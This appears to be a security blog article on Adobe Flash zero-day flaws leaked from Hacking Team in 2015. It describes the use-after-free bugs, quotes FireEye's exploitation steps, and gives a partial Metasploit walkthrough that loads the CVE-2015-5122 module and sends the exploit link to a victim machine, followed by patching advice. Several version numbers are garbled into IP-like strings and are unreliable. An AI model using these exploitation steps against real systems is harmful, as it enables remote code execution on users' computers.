Hacking Team is a Milan-based information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.Its “Remote Control Systems” enable governments and corporations to monitor the communications of internet users, decipher their encrypted files and emails, record Skype and other Voice over IP communications, and remotely activate microphones and camera on target computers.Hacking Team states that they have the ability to disable their software if it is used unethically.
The Recent Cyber Attack that exposed 400GB of data belonging to Hacking Team has following Zero Day vulnerability in Adobe Flash Player in their data.
Let us see in detail , How these vulnerability affects the adobe flash player.
This Flash-based vulnerability, dubbed the “most beautiful Flash bug for the last four years” in Hacking Team’s internal notes,
Use-after-free vulnerability present in the ByteArray class located in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 22.214.171.1246 and 14.x through 126.96.36.199 on Windows and OS X and 11.x through 188.8.131.528 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.
The critical zero-day vulnerability in Adobe Flash is a Use-After-Free() programming flaw (CVE-2015-5122) which is similar to the CVE-2015-5119.
Use-after-free vulnerability present in the DisplayObject class located in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x on Windows and OS X, 14.x through 184.108.40.206 on Windows and OS X, 11.x through 220.127.116.111 on Linux, and 12.x through 18.104.22.168 on Linux Chrome installations allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that leverages improper handling of the opaqueBackground property.
“Successful exploitation [of CVE-2015-5122 flaw] could cause a crash and potentially allow an attacker to take control of the affected system,” Adobe said.
Adobe credited FireEye researcher Dhanesh Kizhakkinan for reporting the vulnerability found in stolen data leaked from Hacking Team.
The flaw can be exploited by freeing a TextLine object within the valueOf function of a custom class when setting the TextLine’s opaqueBackground. As explained by FireEye researchers:
“Once the TextLine object is freed, a Vector object is allocated in its place. Returning from valueOf will overwrite the length field of Vector object with a value of 106. (Initial length is 98).
Exploitation continues by finding the corrupted Vector object by its length, which will be greater than 100.
This enables the object to change an adjacent Vector object’s length to 0x40000000.
Once exploit achieves this, it follows the same mechanism that was used in CVE-2015-5119 PoC.”
This, in turn, allows for attackers to execute shellcode, which pops up a calculator
Use-after-free vulnerability present in the BitmapData class located in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 22.214.171.1242 on Windows and OS X, 14.x through 126.96.36.199 on Windows and OS X, 11.x through 188.8.131.521 on Linux, and 12.x through 184.108.40.206 on Linux Chrome installations allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.
The vulnerability can be triggered by the following steps:
1) From a new BitmapData object, prepare 2 Array objects, new 2 MyClass objects, and assign the MyClass object to each Array objects.
2 ) Once the valueOf function of MyClass is override, it calls the BitmapData.paletteMap with the 2 Array objects as parameters. The BitmapData.paletteMap will trigger the valueOf function.
3) In the valueOf function, it will call BitmapData.dispose() to dispose the underlying memory of BitmapData object, thus causing Flash Player to crash.
Steps to exploit flash zero day vulnerability with metasploit :
Note: This tutorial is for informational purposes only.
- First download the exploit code by creating an empty document and name it:
- download the payload from here: https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/CVE-2015-5122
Figure 2:Download the Exploit
- Add it to the following directory:
- Now copy the exploit code and paste it into the empty document.
Use the following command to copy the file from the root/desktop to the Metasploit framework modules folder (create the flash folder if it is not here):
mv /root/Desktop/Adobe_Flash_HackingTeam_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/flash/
Figure 3: Move the Exploit in exploit-Modules
- You can use the following command to check whether the file has been actually copied to the destination folder:
Figure 4: Confirm the destination folder
- open a new terminal and start Metasploit (and following services if not already started) using the following command(s):
service postgresql start
service metasploit start
Figure 5: Start msfconsole
- Now we have got Metasploit started and running with our newly imported exploit in it, we can use the following command to search for it:
After this use the following command to use the newly added exploit module:
Let’s check the options for Metasploit CVE-2015-5122 module with the following command:
- We will keep the default options and type “exploit” to trigger our exploit:
- Let’s open the link from a Windows 7 virtual machine with a vulnerable browser (Firefox) and a vulnerable version of Flash Player (< 220.127.116.11) installed.
Figure 7: Send the Link to the victim
How to avoid getting infected by these exploits…
– Update Flash Player and make sure that it is up-to-date: https://get.adobe.com/flashplayer/
If you’re unsure whether your browser has Flash installed or what version it is running, you can browse to this link : https://www.adobe.com/software/flash/about/
– Install security patches if any and keep your OS updated.
– Keep your browser updated.
Attack & PenTest Team,